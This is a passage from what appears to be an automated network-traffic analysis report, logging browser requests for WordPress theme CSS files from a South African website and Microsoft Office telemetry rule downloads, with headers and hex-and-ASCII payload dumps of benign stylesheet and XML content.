                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:13 UTC279INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:25:25 GMT
                                                                                                                      ETag: "d9-5eed4eae66b40"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 217
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:13 UTC217INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d
                                                                                                                      Data Ascii: /*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      68192.168.2.449828196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC602OUTGET /wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:13 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "c30f-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 49935
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:13 UTC7909INData Raw: 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 0a 09 73 72 63 3a 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 32 27 29 3b 0a 09 73 72 63 3a 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 23 69 65 66 69 78 26 76 3d 34 2e 32 27 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 0a 09 09 75 72 6c 28 27 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 3f 76 3d 34 2e 32 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 2c 0a 09 20
                                                                                                                      Data Ascii: @font-face{font-family:'FontAwesome';src:url('fonts/fontawesome-webfont.eot?v=4.2');src:url('fonts/fontawesome-webfont.eot?#iefix&v=4.2') format('embedded-opentype'),url('fonts/fontawesome-webfont.svg#fontawesomeregular?v=4.2') format('svg'),
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 73 74 69 6f 6e 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 39 22 3b 7d 0a 2e 69 63 6f 6e 2d 69 6e 66 6f 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 61 22 3b 7d 0a 2e 69 63 6f 6e 2d 73 63 72 65 65 6e 73 68 6f 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 62 22 3b 7d 0a 2e 69 63 6f 6e 2d 72 65 6d 6f 76 65 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 63 22 3b 7d 0a 2e 69 63 6f 6e 2d 6f 6b 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 64 22 3b 7d 0a 2e 69 63 6f 6e 2d 62 61 6e 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 35 65 22 3b 7d 0a 2e 69 63 6f 6e 2d 61 72
                                                                                                                      Data Ascii: stion-sign:before{content:"\f059";}.icon-info-sign:before{content:"\f05a";}.icon-screenshot:before{content:"\f05b";}.icon-remove-circle:before{content:"\f05c";}.icon-ok-circle:before{content:"\f05d";}.icon-ban-circle:before{content:"\f05e";}.icon-ar
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 31 22 3b 7d 0a 2e 69 63 6f 6e 2d 73 68 69 65 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 32 22 3b 7d 0a 2e 69 63 6f 6e 2d 63 61 6c 65 6e 64 61 72 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 33 22 3b 7d 0a 2e 69 63 6f 6e 2d 66 69 72 65 2d 65 78 74 69 6e 67 75 69 73 68 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 34 22 3b 7d 0a 2e 69 63 6f 6e 2d 72 6f 63 6b 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 35 22 3b 7d 0a 2e 69 63 6f 6e 2d 6d 61 78 63 64 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 33 36 22 3b 7d 0a 2e 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 73 69 67 6e 2d 6c 65 66
                                                                                                                      Data Ascii: efore{content:"\f131";}.icon-shield:before{content:"\f132";}.icon-calendar-empty:before{content:"\f133";}.icon-fire-extinguisher:before{content:"\f134";}.icon-rocket:before{content:"\f135";}.icon-maxcdn:before{content:"\f136";}.icon-chevron-sign-lef
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 6f 6e 74 65 6e 74 3a 22 5c 66 30 33 30 22 7d 2e 66 61 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 33 31 22 7d 2e 66 61 2d 62 6f 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 33 32 22 7d 2e 66 61 2d 69 74 61 6c 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 33 33 22 7d 2e 66 61 2d 74 65 78 74 2d 68 65 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 33 34 22 7d 2e 66 61 2d 74 65 78 74 2d 77 69 64 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 33 35 22 7d 2e 66 61 2d 61 6c 69 67 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 33 36 22 7d 2e 66 61 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e
                                                                                                                      Data Ascii: ontent:"\f030"}.fa-font:before{content:"\f031"}.fa-bold:before{content:"\f032"}.fa-italic:before{content:"\f033"}.fa-text-height:before{content:"\f034"}.fa-text-width:before{content:"\f035"}.fa-align-left:before{content:"\f036"}.fa-align-center:before{con
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 65 6e 74 3a 22 5c 66 31 31 35 22 7d 2e 66 61 2d 73 6d 69 6c 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 38 22 7d 2e 66 61 2d 66 72 6f 77 6e 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 39 22 7d 2e 66 61 2d 6d 65 68 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 61 22 7d 2e 66 61 2d 67 61 6d 65 70 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 62 22 7d 2e 66 61 2d 6b 65 79 62 6f 61 72 64 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 63 22 7d 2e 66 61 2d 66 6c 61 67 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 31 64 22 7d 2e 66 61 2d 66 6c 61 67 2d 63 68 65 63 6b 65 72 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74
                                                                                                                      Data Ascii: ent:"\f115"}.fa-smile-o:before{content:"\f118"}.fa-frown-o:before{content:"\f119"}.fa-meh-o:before{content:"\f11a"}.fa-gamepad:before{content:"\f11b"}.fa-keyboard-o:before{content:"\f11c"}.fa-flag-o:before{content:"\f11d"}.fa-flag-checkered:before{content
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 33 22 7d 2e 66 61 2d 74 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 34 22 7d 2e 66 61 2d 62 69 6e 6f 63 75 6c 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 35 22 7d 2e 66 61 2d 70 6c 75 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 36 22 7d 2e 66 61 2d 73 6c 69 64 65 73 68 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 37 22 7d 2e 66 61 2d 74 77 69 74 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 38 22 7d 2e 66 61 2d 79 65 6c 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 65 39 22 7d 2e 66 61 2d 6e 65 77 73 70 61 70 65 72 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66
                                                                                                                      Data Ascii: content:"\f1e3"}.fa-tty:before{content:"\f1e4"}.fa-binoculars:before{content:"\f1e5"}.fa-plug:before{content:"\f1e6"}.fa-slideshare:before{content:"\f1e7"}.fa-twitch:before{content:"\f1e8"}.fa-yelp:before{content:"\f1e9"}.fa-newspaper-o:before{content:"\f
                                                                                                                      2024-12-03 07:55:14 UTC2026INData Raw: 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 38 22 7d 2e 66 61 2d 61 64 64 72 65 73 73 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 39 22 7d 2e 66 61 2d 61 64 64 72 65 73 73 2d 62 6f 6f 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 61 22 7d 2e 66 61 2d 76 63 61 72 64 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 61 64 64 72 65 73 73 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 62 22 7d 2e 66 61 2d 76 63 61 72 64 2d 6f 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 61 64 64 72 65 73 73 2d 63 61 72 64 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 62 63 22 7d 2e 66 61 2d 75 73 65 72 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66
                                                                                                                      Data Ascii: fore{content:"\f2b8"}.fa-address-book:before{content:"\f2b9"}.fa-address-book-o:before{content:"\f2ba"}.fa-vcard:before,.fa-address-card:before{content:"\f2bb"}.fa-vcard-o:before,.fa-address-card-o:before{content:"\f2bc"}.fa-user-circle:before{content:"\f


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      69192.168.2.449827196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC597OUTGET /wp-content/themes/salient/css/build/grid-system.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:13 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "55e8-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 21992
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:13 UTC7909INData Raw: 2e 63 6f 6c 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 75 6c 6c 2d 70 61 67 65 2d 69 6e 6e 65 72 3e 2e 63 6f 6e 74 61 69 6e 65 72 3e 2e 73 70 61 6e 5f 31 32 2c 2e 66 75 6c 6c 2d 70 61 67 65 2d 69 6e 6e 65 72 3e 2e 73 70 61 6e 5f 31 32 2c 68 74 6d 6c 20 62 6f 64 79 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 3e 2e 73 70 61 6e 5f 31 32 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 39 30 70 78 29 7b 2e 63 6f 6c 7b 6d 61 72
                                                                                                                      Data Ascii: .col{position:relative;display:block;width:100%}.full-page-inner>.container>.span_12,.full-page-inner>.span_12,html body .vc_row-fluid>.span_12{display:flex;display:-ms-flexbox;-ms-flex-wrap:wrap;flex-wrap:wrap;float:none}@media (min-width:690px){.col{mar
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 69 6e 67 3a 63 61 6c 63 28 31 30 30 76 77 20 2a 20 2e 30 39 29 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 39 70 78 29 7b 2e 66 75 6c 6c 2d 77 69 64 74 68 2d 63 6f 6e 74 65 6e 74 20 2e 63 6f 6c 2e 70 61 64 64 69 6e 67 2d 31 2d 70 65 72 63 65 6e 74 3e 2e 76 63 5f 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 7b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 31 30 30 76 77 20 2a 20 2e 30 31 29 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 39 70 78 29 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 39 31 70 78 29 7b 2e 76 63 5f 63 6f 6c 2d 78 73 2d 31 32 3a 6e 6f 74 28 5b 64 61 74 61 2d 74 2d 77 2d 69 6e 68 65 72 69 74 73 3d 73 6d 61 6c 6c 5f 64 65 73 6b 74 6f 70 5d 29 7b 77 69 64 74
                                                                                                                      Data Ascii: ing:calc(100vw * .09)}}@media only screen and (max-width:999px){.full-width-content .col.padding-1-percent>.vc_column-inner{padding:calc(100vw * .01)}}@media (max-width:999px) and (min-width:691px){.vc_col-xs-12:not([data-t-w-inherits=small_desktop]){widt
                                                                                                                      2024-12-03 07:55:14 UTC6083INData Raw: 34 30 25 7d 2e 76 63 5f 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 31 5c 2f 35 7b 6c 65 66 74 3a 32 30 25 7d 2e 76 63 5f 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 30 5c 2f 35 7b 6c 65 66 74 3a 61 75 74 6f 7d 2e 76 63 5f 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 35 5c 2f 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 30 25 7d 2e 76 63 5f 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 34 5c 2f 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 30 25 7d 2e 76 63 5f 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 33 5c 2f 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 30 25 7d 2e 76 63 5f 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 5c 2f 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 30 25 7d 2e 76 63 5f 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 31 5c 2f 35 7b 6d 61 72 67 69 6e 2d 6c 65 66
                                                                                                                      Data Ascii: 40%}.vc_col-md-push-1\/5{left:20%}.vc_col-md-push-0\/5{left:auto}.vc_col-md-offset-5\/5{margin-left:100%}.vc_col-md-offset-4\/5{margin-left:80%}.vc_col-md-offset-3\/5{margin-left:60%}.vc_col-md-offset-2\/5{margin-left:40%}.vc_col-md-offset-1\/5{margin-lef


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      70192.168.2.44983613.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:14 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 471
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                      x-ms-request-id: 4c860516-801e-00a3-3252-437cfb000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075513Z-174f7845968kdththC1EWRzvxn0000000k30000000000sw6
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      71192.168.2.44983313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:14 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 416
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                      ETag: "0x8DC582BAEA4B445"
                                                                                                                      x-ms-request-id: 6da3e3c6-601e-0084-52b4-426b3f000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075513Z-174f78459684bddphC1EWRbht400000015e0000000002e09
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:14 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      72192.168.2.449831196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC591OUTGET /wp-content/themes/salient/css/build/style.css?ver=15.0.6 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:14 UTC285INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:14 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "28459-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 164953
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
